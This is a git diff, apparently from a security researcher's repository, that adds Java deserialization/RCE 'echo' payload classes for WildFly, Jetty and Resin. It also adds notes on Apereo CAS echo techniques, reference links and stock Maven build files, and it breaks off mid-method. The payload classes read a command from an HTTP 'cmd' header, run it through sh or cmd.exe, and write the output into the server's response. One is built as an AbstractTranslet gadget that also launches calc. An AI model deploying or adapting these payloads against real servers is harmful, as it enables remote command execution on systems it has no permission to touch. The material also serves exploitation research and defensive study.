-Join($file.DirectoryName,"/a.txt");echo 222 |Out-File $f +``` + +### Apereo CAS 回显 + +https://www.00theway.org/2020/01/04/apereo-cas-rce/ + +https://www.freebuf.com/vuls/226149.html + + +org.springframework.webflow.context.ExternalContextHolder.getExternalContext()方法可以获取到上下文关联信息,然后通过getNativeRequest()方法获取request对象通过getNativeResponse()方法获取response对象。同时提及到org.springframework.cglib.core.ReflectUtils.defineClass().newInstance();加载payload。猜测大佬的想法是通过defineClass从byte[]还原出一个Class对象,该恶意对象主要是执行命令,获取response对象,将执行命令后的结果通过response对象的输出流输出。 + +参考代码实现:https://github.com/potats0/CasExp/blob/master/src/main/java/payloads/exploitType/exploitDump.java + + + +>参考: +> +>[Java 反序列化回显的多种姿势](https://www.joyk.com/dig/detail/1624894461629758) +> +>[Java Web代码执行漏洞回显总结](https://l3yx.github.io/2020/03/31/Java-Web%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%9B%9E%E6%98%BE%E6%80%BB%E7%BB%93/) +> +>[通杀漏洞利用回显方法-linux平台](https://www.00theway.org/2020/01/17/java-god-s-eye/) +> +>[linux下java反序列化通杀回显方法的低配版实现](https://xz.aliyun.com/t/7307) +> +>[Tomcat中一种半通用回显方法](https://xz.aliyun.com/t/7348) +> +>[Java反射-修改字段值, 反射修改static final修饰的字段](https://www.cnblogs.com/noKing/p/9038234.html) +> +>[基于全局储存的新思路 | Tomcat的一种通用回显方法研究](https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247484799&idx=1&sn=42e7807d6ea0d8917b45e8aa2e4dba44) +> +>[tomcat不出网回显连续剧第六集](https://xz.aliyun.com/t/7535) +> +>[前尘——返回执行结果的回显链](https://www.anquanke.com/post/id/253661) +> +>[Weblogic使用ClassLoader和RMI来回显命令执行结果](https://xz.aliyun.com/t/7228) +>[JAVA反序列化回显学习](https://cangqingzhe.github.io/2020/12/17/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9B%9E%E6%98%BE%E5%AD%A6%E4%B9%A0/) diff --git "a/java\345\233\236\346\230\276/WildFly/Echo_ServletRequestContext.java" "b/java\345\233\236\346\230\276/WildFly/Echo_ServletRequestContext.java" new file mode 100644 index 0000000..4dc7b8e --- /dev/null +++ "b/java\345\233\236\346\230\276/WildFly/Echo_ServletRequestContext.java" @@ -0,0 +1,68 @@ +package com.firebasky.exp; + +/** + * TargetObject = {java.lang.Thread} + * ---> threadLocals = {java.lang.ThreadLocal$ThreadLocalMap} + * ---> table = {class [Ljava.lang.ThreadLocal$ThreadLocalMap$Entry;} + * ---> [59] = {java.lang.ThreadLocal$ThreadLocalMap$Entry} + * ---> value = {io.undertow.servlet.handlers.ServletRequestContext} + */ + +import java.lang.reflect.Method; + +/** + * WildFly 回显 + */ +public class Echo_ServletRequestContext { + static { + try { + getResponse(); + } catch (Exception e) { + e.printStackTrace(); + } + } + public static void getResponse() throws Exception { + Thread thread = Thread.currentThread(); + java.lang.reflect.Field threadLocals = Thread.class.getDeclaredField("threadLocals"); + threadLocals.setAccessible(true); + Object threadLocalMap = threadLocals.get(thread); + + Class threadLocalMapClazz = Class.forName("java.lang.ThreadLocal$ThreadLocalMap"); + java.lang.reflect.Field tableField = threadLocalMapClazz.getDeclaredField("table"); + tableField.setAccessible(true); + Object[] objects = (Object[]) tableField.get(threadLocalMap); + + Class entryClass = Class.forName("java.lang.ThreadLocal$ThreadLocalMap$Entry"); + java.lang.reflect.Field entryValueField = entryClass.getDeclaredField("value"); + entryValueField.setAccessible(true); + + for (Object object : objects) { + if (object != null) { + Object valueObject = entryValueField.get(object); + if (valueObject != null) { + if (valueObject.getClass().getName().equals("io.undertow.servlet.handlers.ServletRequestContext")) { + //response + Method getServletResponse = valueObject.getClass().getDeclaredMethod("getServletResponse"); + getServletResponse.setAccessible(true); + Object response = getServletResponse.invoke(valueObject); + //request + Method getServletRequest = valueObject.getClass().getDeclaredMethod("getServletRequest"); + getServletRequest.setAccessible(true); + Object request = getServletRequest.invoke(valueObject); + //echo + java.io.PrintWriter writer = (java.io.PrintWriter) response.getClass().getMethod("getWriter").invoke(response); + Method getHeader = request.getClass().getMethod("getHeader",String.class); + String cmd1 = (String) getHeader.invoke(request, "cmd"); + String[] cmd = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", cmd1} : new String[]{"cmd.exe", "/c",cmd1}; + java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); + java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a"); + String output = s.hasNext() ? s.next() : ""; + writer.write("by Firebasky:"); + writer.write("\n"+output); + writer.close(); + } + } + } + } + } +} diff --git "a/java\345\233\236\346\230\276/java\345\233\236\346\230\276.iml" "b/java\345\233\236\346\230\276/java\345\233\236\346\230\276.iml" new file mode 100644 index 0000000..82fb2f5 --- /dev/null +++ "b/java\345\233\236\346\230\276/java\345\233\236\346\230\276.iml" @@ -0,0 +1,89 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git "a/java\345\233\236\346\230\276/jetty/Echo_HttpConnection.java" "b/java\345\233\236\346\230\276/jetty/Echo_HttpConnection.java" new file mode 100644 index 0000000..5b3f557 --- /dev/null +++ "b/java\345\233\236\346\230\276/jetty/Echo_HttpConnection.java" @@ -0,0 +1,75 @@ +package com.firebasky.exp; + +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; + +import java.lang.reflect.Method; + +/** + * jetty回显 + */ +public class Echo_HttpConnection extends AbstractTranslet { + static { + try { + getResponse(); + Runtime.getRuntime().exec("calc"); + } catch (Exception e) { + e.printStackTrace(); + } + } + public static void getResponse() throws Exception { + Thread thread = Thread.currentThread(); + java.lang.reflect.Field threadLocals = Thread.class.getDeclaredField("threadLocals"); + threadLocals.setAccessible(true); + Object threadLocalMap = threadLocals.get(thread); + + Class threadLocalMapClazz = Class.forName("java.lang.ThreadLocal$ThreadLocalMap"); + java.lang.reflect.Field tableField = threadLocalMapClazz.getDeclaredField("table"); + tableField.setAccessible(true); + Object[] objects = (Object[]) tableField.get(threadLocalMap); + + Class entryClass = Class.forName("java.lang.ThreadLocal$ThreadLocalMap$Entry"); + java.lang.reflect.Field entryValueField = entryClass.getDeclaredField("value"); + entryValueField.setAccessible(true); + + for (Object object : objects) { + if (object != null) { + Object valueObject = entryValueField.get(object); + if (valueObject != null) { + if (valueObject.getClass().getName().equals("org.eclipse.jetty.server.HttpConnection")) { + Method getHttpChannel = valueObject.getClass().getDeclaredMethod("getHttpChannel"); + getHttpChannel.setAccessible(true); + Object httpChannel = getHttpChannel.invoke(valueObject); + Class HttpChannel = httpChannel.getClass(); + + Object request = HttpChannel.getMethod("getRequest").invoke(httpChannel); + Object response = HttpChannel.getMethod("getResponse").invoke(httpChannel); + java.io.PrintWriter writer = (java.io.PrintWriter) response.getClass().getMethod("getWriter").invoke(response); + Method getHeader = request.getClass().getMethod("getHeader",String.class); + String cmd1 = (String) getHeader.invoke(request, "cmd"); + String[] cmd = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", cmd1} : new String[]{"cmd.exe", "/c",cmd1}; + java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); + java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a"); + String output = s.hasNext() ? s.next() : ""; + writer.write("by Firebasky:"); + writer.write("\n"+output); + writer.close(); + } + } + } + } + } + + @Override + public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { + + } + + @Override + public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { + + } +} diff --git "a/java\345\233\236\346\230\276/mvnw" "b/java\345\233\236\346\230\276/mvnw" new file mode 100644 index 0000000..a16b543 --- /dev/null +++ "b/java\345\233\236\346\230\276/mvnw" @@ -0,0 +1,310 @@ +#!/bin/sh +# ---------------------------------------------------------------------------- +# Licensed to the Apache Software Foundation (ASF) under one +# or more contributor license agreements. See the NOTICE file +# distributed with this work for additional information +# regarding copyright ownership. The ASF licenses this file +# to you under the Apache License, Version 2.0 (the +# "License"); you may not use this file except in compliance +# with the License. You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, +# software distributed under the License is distributed on an +# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +# KIND, either express or implied. See the License for the +# specific language governing permissions and limitations +# under the License. +# ---------------------------------------------------------------------------- + +# ---------------------------------------------------------------------------- +# Maven Start Up Batch script +# +# Required ENV vars: +# ------------------ +# JAVA_HOME - location of a JDK home dir +# +# Optional ENV vars +# ----------------- +# M2_HOME - location of maven2's installed home dir +# MAVEN_OPTS - parameters passed to the Java VM when running Maven +# e.g. to debug Maven itself, use +# set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 +# MAVEN_SKIP_RC - flag to disable loading of mavenrc files +# ---------------------------------------------------------------------------- + +if [ -z "$MAVEN_SKIP_RC" ] ; then + + if [ -f /etc/mavenrc ] ; then + . /etc/mavenrc + fi + + if [ -f "$HOME/.mavenrc" ] ; then + . "$HOME/.mavenrc" + fi + +fi + +# OS specific support. $var _must_ be set to either true or false. +cygwin=false; +darwin=false; +mingw=false +case "`uname`" in + CYGWIN*) cygwin=true ;; + MINGW*) mingw=true;; + Darwin*) darwin=true + # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home + # See https://developer.apple.com/library/mac/qa/qa1170/_index.html + if [ -z "$JAVA_HOME" ]; then + if [ -x "/usr/libexec/java_home" ]; then + export JAVA_HOME="`/usr/libexec/java_home`" + else + export JAVA_HOME="/Library/Java/Home" + fi + fi + ;; +esac + +if [ -z "$JAVA_HOME" ] ; then + if [ -r /etc/gentoo-release ] ; then + JAVA_HOME=`java-config --jre-home` + fi +fi + +if [ -z "$M2_HOME" ] ; then + ## resolve links - $0 may be a link to maven's home + PRG="$0" + + # need this for relative symlinks + while [ -h "$PRG" ] ; do + ls=`ls -ld "$PRG"` + link=`expr "$ls" : '.*-> \(.*\)$'` + if expr "$link" : '/.*' > /dev/null; then + PRG="$link" + else + PRG="`dirname "$PRG"`/$link" + fi + done + + saveddir=`pwd` + + M2_HOME=`dirname "$PRG"`/.. + + # make it fully qualified + M2_HOME=`cd "$M2_HOME" && pwd` + + cd "$saveddir" + # echo Using m2 at $M2_HOME +fi + +# For Cygwin, ensure paths are in UNIX format before anything is touched +if $cygwin ; then + [ -n "$M2_HOME" ] && + M2_HOME=`cygpath --unix "$M2_HOME"` + [ -n "$JAVA_HOME" ] && + JAVA_HOME=`cygpath --unix "$JAVA_HOME"` + [ -n "$CLASSPATH" ] && + CLASSPATH=`cygpath --path --unix "$CLASSPATH"` +fi + +# For Mingw, ensure paths are in UNIX format before anything is touched +if $mingw ; then + [ -n "$M2_HOME" ] && + M2_HOME="`(cd "$M2_HOME"; pwd)`" + [ -n "$JAVA_HOME" ] && + JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`" +fi + +if [ -z "$JAVA_HOME" ]; then + javaExecutable="`which javac`" + if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then + # readlink(1) is not available as standard on Solaris 10. + readLink=`which readlink` + if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then + if $darwin ; then + javaHome="`dirname \"$javaExecutable\"`" + javaExecutable="`cd \"$javaHome\" && pwd -P`/javac" + else + javaExecutable="`readlink -f \"$javaExecutable\"`" + fi + javaHome="`dirname \"$javaExecutable\"`" + javaHome=`expr "$javaHome" : '\(.*\)/bin'` + JAVA_HOME="$javaHome" + export JAVA_HOME + fi + fi +fi + +if [ -z "$JAVACMD" ] ; then + if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD="$JAVA_HOME/jre/sh/java" + else + JAVACMD="$JAVA_HOME/bin/java" + fi + else + JAVACMD="`which java`" + fi +fi + +if [ ! -x "$JAVACMD" ] ; then + echo "Error: JAVA_HOME is not defined correctly." >&2 + echo " We cannot execute $JAVACMD" >&2 + exit 1 +fi + +if [ -z "$JAVA_HOME" ] ; then + echo "Warning: JAVA_HOME environment variable is not set." +fi + +CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher + +# traverses directory structure from process work directory to filesystem root +# first directory with .mvn subdirectory is considered project base directory +find_maven_basedir() { + + if [ -z "$1" ] + then + echo "Path not specified to find_maven_basedir" + return 1 + fi + + basedir="$1" + wdir="$1" + while [ "$wdir" != '/' ] ; do + if [ -d "$wdir"/.mvn ] ; then + basedir=$wdir + break + fi + # workaround for JBEAP-8937 (on Solaris 10/Sparc) + if [ -d "${wdir}" ]; then + wdir=`cd "$wdir/.."; pwd` + fi + # end of workaround + done + echo "${basedir}" +} + +# concatenates all lines of a file +concat_lines() { + if [ -f "$1" ]; then + echo "$(tr -s '\n' ' ' < "$1")" + fi +} + +BASE_DIR=`find_maven_basedir "$(pwd)"` +if [ -z "$BASE_DIR" ]; then + exit 1; +fi + +########################################################################################## +# Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +# This allows using the maven wrapper in projects that prohibit checking in binary data. +########################################################################################## +if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found .mvn/wrapper/maven-wrapper.jar" + fi +else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..." + fi + if [ -n "$MVNW_REPOURL" ]; then + jarUrl="$MVNW_REPOURL/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar" + else + jarUrl="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar" + fi + while IFS="=" read key value; do + case "$key" in (wrapperUrl) jarUrl="$value"; break ;; + esac + done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties" + if [ "$MVNW_VERBOSE" = true ]; then + echo "Downloading from: $jarUrl" + fi + wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" + if $cygwin; then + wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"` + fi + + if command -v wget > /dev/null; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found wget ... using wget" + fi + if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then + wget "$jarUrl" -O "$wrapperJarPath" + else + wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath" + fi + elif command -v curl > /dev/null; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found curl ... using curl" + fi + if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then + curl -o "$wrapperJarPath" "$jarUrl" -f + else + curl --user $MVNW_USERNAME:$MVNW_PASSWORD -o "$wrapperJarPath" "$jarUrl" -f + fi + + else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Falling back to using Java to download" + fi + javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java" + # For Cygwin, switch paths to Windows format before running javac + if $cygwin; then + javaClass=`cygpath --path --windows "$javaClass"` + fi + if [ -e "$javaClass" ]; then + if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo " - Compiling MavenWrapperDownloader.java ..." + fi + # Compiling the Java class + ("$JAVA_HOME/bin/javac" "$javaClass") + fi + if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then + # Running the downloader + if [ "$MVNW_VERBOSE" = true ]; then + echo " - Running MavenWrapperDownloader.java ..." + fi + ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR") + fi + fi + fi +fi +########################################################################################## +# End of extension +########################################################################################## + +export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"} +if [ "$MVNW_VERBOSE" = true ]; then + echo $MAVEN_PROJECTBASEDIR +fi +MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS" + +# For Cygwin, switch paths to Windows format before running java +if $cygwin; then + [ -n "$M2_HOME" ] && + M2_HOME=`cygpath --path --windows "$M2_HOME"` + [ -n "$JAVA_HOME" ] && + JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"` + [ -n "$CLASSPATH" ] && + CLASSPATH=`cygpath --path --windows "$CLASSPATH"` + [ -n "$MAVEN_PROJECTBASEDIR" ] && + MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"` +fi + +# Provide a "standardized" way to retrieve the CLI args that will +# work with both Windows and non-Windows executions. +MAVEN_CMD_LINE_ARGS="$MAVEN_CONFIG $@" +export MAVEN_CMD_LINE_ARGS + +WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain + +exec "$JAVACMD" \ + $MAVEN_OPTS \ + -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \ + "-Dmaven.home=${M2_HOME}" "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \ + ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@" diff --git "a/java\345\233\236\346\230\276/mvnw.cmd" "b/java\345\233\236\346\230\276/mvnw.cmd" new file mode 100644 index 0000000..c8d4337 --- /dev/null +++ "b/java\345\233\236\346\230\276/mvnw.cmd" @@ -0,0 +1,182 @@ +@REM ---------------------------------------------------------------------------- +@REM Licensed to the Apache Software Foundation (ASF) under one +@REM or more contributor license agreements. See the NOTICE file +@REM distributed with this work for additional information +@REM regarding copyright ownership. The ASF licenses this file +@REM to you under the Apache License, Version 2.0 (the +@REM "License"); you may not use this file except in compliance +@REM with the License. You may obtain a copy of the License at +@REM +@REM https://www.apache.org/licenses/LICENSE-2.0 +@REM +@REM Unless required by applicable law or agreed to in writing, +@REM software distributed under the License is distributed on an +@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +@REM KIND, either express or implied. See the License for the +@REM specific language governing permissions and limitations +@REM under the License. +@REM ---------------------------------------------------------------------------- + +@REM ---------------------------------------------------------------------------- +@REM Maven Start Up Batch script +@REM +@REM Required ENV vars: +@REM JAVA_HOME - location of a JDK home dir +@REM +@REM Optional ENV vars +@REM M2_HOME - location of maven2's installed home dir +@REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands +@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a keystroke before ending +@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven +@REM e.g. to debug Maven itself, use +@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 +@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files +@REM ---------------------------------------------------------------------------- + +@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on' +@echo off +@REM set title of command window +title %0 +@REM enable echoing by setting MAVEN_BATCH_ECHO to 'on' +@if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO% + +@REM set %HOME% to equivalent of $HOME +if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%") + +@REM Execute a user defined script before this one +if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre +@REM check for pre script, once with legacy .bat ending and once with .cmd ending +if exist "%HOME%\mavenrc_pre.bat" call "%HOME%\mavenrc_pre.bat" +if exist "%HOME%\mavenrc_pre.cmd" call "%HOME%\mavenrc_pre.cmd" +:skipRcPre + +@setlocal + +set ERROR_CODE=0 + +@REM To isolate internal variables from possible post scripts, we use another setlocal +@setlocal + +@REM ==== START VALIDATION ==== +if not "%JAVA_HOME%" == "" goto OkJHome + +echo. +echo Error: JAVA_HOME not found in your environment. >&2 +echo Please set the JAVA_HOME variable in your environment to match the >&2 +echo location of your Java installation. >&2 +echo. +goto error + +:OkJHome +if exist "%JAVA_HOME%\bin\java.exe" goto init + +echo. +echo Error: JAVA_HOME is set to an invalid directory. >&2 +echo JAVA_HOME = "%JAVA_HOME%" >&2 +echo Please set the JAVA_HOME variable in your environment to match the >&2 +echo location of your Java installation. >&2 +echo. +goto error + +@REM ==== END VALIDATION ==== + +:init + +@REM Find the project base dir, i.e. the directory that contains the folder ".mvn". +@REM Fallback to current working directory if not found. + +set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR% +IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir + +set EXEC_DIR=%CD% +set WDIR=%EXEC_DIR% +:findBaseDir +IF EXIST "%WDIR%"\.mvn goto baseDirFound +cd .. +IF "%WDIR%"=="%CD%" goto baseDirNotFound +set WDIR=%CD% +goto findBaseDir + +:baseDirFound +set MAVEN_PROJECTBASEDIR=%WDIR% +cd "%EXEC_DIR%" +goto endDetectBaseDir + +:baseDirNotFound +set MAVEN_PROJECTBASEDIR=%EXEC_DIR% +cd "%EXEC_DIR%" + +:endDetectBaseDir + +IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig + +@setlocal EnableExtensions EnableDelayedExpansion +for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a +@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS% + +:endReadAdditionalConfig + +SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe" +set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar" +set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain + +set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar" + +FOR /F "tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO ( + IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B +) + +@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +@REM This allows using the maven wrapper in projects that prohibit checking in binary data. +if exist %WRAPPER_JAR% ( + if "%MVNW_VERBOSE%" == "true" ( + echo Found %WRAPPER_JAR% + ) +) else ( + if not "%MVNW_REPOURL%" == "" ( + SET DOWNLOAD_URL="%MVNW_REPOURL%/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar" + ) + if "%MVNW_VERBOSE%" == "true" ( + echo Couldn't find %WRAPPER_JAR%, downloading it ... + echo Downloading from: %DOWNLOAD_URL% + ) + + powershell -Command "&{"^ + "$webclient = new-object System.Net.WebClient;"^ + "if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^ + "$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^ + "}"^ + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^ + "}" + if "%MVNW_VERBOSE%" == "true" ( + echo Finished downloading %WRAPPER_JAR% + ) +) +@REM End of extension + +@REM Provide a "standardized" way to retrieve the CLI args that will +@REM work with both Windows and non-Windows executions. +set MAVEN_CMD_LINE_ARGS=%* + +%MAVEN_JAVA_EXE% %JVM_CONFIG_MAVEN_PROPS% %MAVEN_OPTS% %MAVEN_DEBUG_OPTS% -classpath %WRAPPER_JAR% "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %* +if ERRORLEVEL 1 goto error +goto end + +:error +set ERROR_CODE=1 + +:end +@endlocal & set ERROR_CODE=%ERROR_CODE% + +if not "%MAVEN_SKIP_RC%" == "" goto skipRcPost +@REM check for post script, once with legacy .bat ending and once with .cmd ending +if exist "%HOME%\mavenrc_post.bat" call "%HOME%\mavenrc_post.bat" +if exist "%HOME%\mavenrc_post.cmd" call "%HOME%\mavenrc_post.cmd" +:skipRcPost + +@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on' +if "%MAVEN_BATCH_PAUSE%" == "on" pause + +if "%MAVEN_TERMINATE_CMD%" == "on" exit %ERROR_CODE% + +exit /B %ERROR_CODE% diff --git "a/java\345\233\236\346\230\276/pom.xml" "b/java\345\233\236\346\230\276/pom.xml" new file mode 100644 index 0000000..d0167b3 --- /dev/null +++ "b/java\345\233\236\346\230\276/pom.xml" @@ -0,0 +1,41 @@ + + + 4.0.0 + + org.springframework.boot + spring-boot-starter-parent + 2.5.5 + + + com.firebasky + echo + 0.0.1-SNAPSHOT + echo + echo for java exec + + 1.8 + + + + org.springframework.boot + spring-boot-starter-web + + + + org.springframework.boot + spring-boot-starter-test + test + + + + + + + org.springframework.boot + spring-boot-maven-plugin + + + + + diff --git "a/java\345\233\236\346\230\276/resin/Echo_HttpRequest.java" "b/java\345\233\236\346\230\276/resin/Echo_HttpRequest.java" new file mode 100644 index 0000000..5d823fd --- /dev/null +++ "b/java\345\233\236\346\230\276/resin/Echo_HttpRequest.java" @@ -0,0 +1,102 @@ +package com.firebasky.exp; + +/** + * TargetObject = {com.caucho.env.thread2.ResinThread2} + * ---> threadLocals = {java.lang.ThreadLocal$ThreadLocalMap} + * ---> table = {class [Ljava.lang.ThreadLocal$ThreadLocalMap$Entry;} + * ---> [6] = {java.lang.ThreadLocal$ThreadLocalMap$Entry} + * ---> value = {com.caucho.server.http.HttpRequest} + */ + +/** + * resin 回显 + * 1.线程对象中request + * 2.request对象存储在静态变量或者特定类里 + */ +public class Echo_HttpRequest { + static { + try { + getResponse(); + } catch (Exception e) { + e.printStackTrace(); + } + } + //线程对象中request + public static void getResponse() throws Exception { + Thread thread = Thread.currentThread(); + java.lang.reflect.Field threadLocals = Thread.class.getDeclaredField("threadLocals"); + threadLocals.setAccessible(true); + Object threadLocalMap = threadLocals.get(thread); + + Class threadLocalMapClazz = Class.forName("java.lang.ThreadLocal$ThreadLocalMap"); + java.lang.reflect.Field tableField = threadLocalMapClazz.getDeclaredField("table"); + tableField.setAccessible(true); + Object[] objects = (Object[]) tableField.get(threadLocalMap); + + Class entryClass = Class.forName("java.lang.ThreadLocal$ThreadLocalMap$Entry"); + java.lang.reflect.Field entryValueField = entryClass.getDeclaredField("value"); + entryValueField.setAccessible(true); + + for (Object object : objects) { + if (object != null) { + Object valueObject = entryValueField.get(object); + if (valueObject != null) { + if (valueObject.getClass().getName().equals("com.caucho.server.http.HttpRequest")) { + com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)valueObject; + //执行命令 + String cmd1 = httpRequest.getHeader("cmd"); + String[] cmd = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", cmd1} : new String[]{"cmd.exe", "/c",cmd1}; + java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); + java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a"); + String output = s.hasNext() ? s.next() : ""; + //response + com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse(); + httpResponse.setHeader("Content-Length", output.length() + ""); + java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream"); + method.setAccessible(true); + com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse); + httpResponseStream.write(output.getBytes(), 0, output.length()); + httpResponseStream.close(); + } + } + } + } + } + + //request对象存储在静态变量或者特定类里 + public static void getResponse2() throws Exception { + Class tcpsocketLinkClazz = Thread.currentThread().getContextClassLoader().loadClass("com.caucho.network.listen.TcpSocketLink"); + java.lang.reflect.Method getCurrentRequestM = tcpsocketLinkClazz.getMethod("getCurrentRequest"); + Object currentRequest = getCurrentRequestM.invoke(null); + java.lang.reflect.Field f = currentRequest.getClass().getSuperclass().getDeclaredField("_responseFacade"); + f.setAccessible(true); + Object response = f.get(currentRequest); + java.lang.reflect.Method getWriterM = response.getClass().getMethod("getWriter"); + java.io.PrintWriter w = ( java.io.PrintWriter) getWriterM.invoke(response); + //response + String[] cmd = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", "whoami"} : new String[]{"cmd.exe", "/c","whoami"}; + java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); + java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a"); + String output = s.hasNext() ? s.next() : ""; + //输出 + w.write(output); + } + + //request对象存储在静态变量或者特定类里 + public static void getResponse3() throws Exception { + Class si = Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.dispatch.ServletInvocation"); + java.lang.reflect.Method getContextRequest = si.getMethod("getContextRequest"); + com.caucho.server.http.HttpServletRequestImpl req = (com.caucho.server.http.HttpServletRequestImpl) getContextRequest.invoke(null); + try { + if (req.getHeader("cmd") != null) { + String cmd = 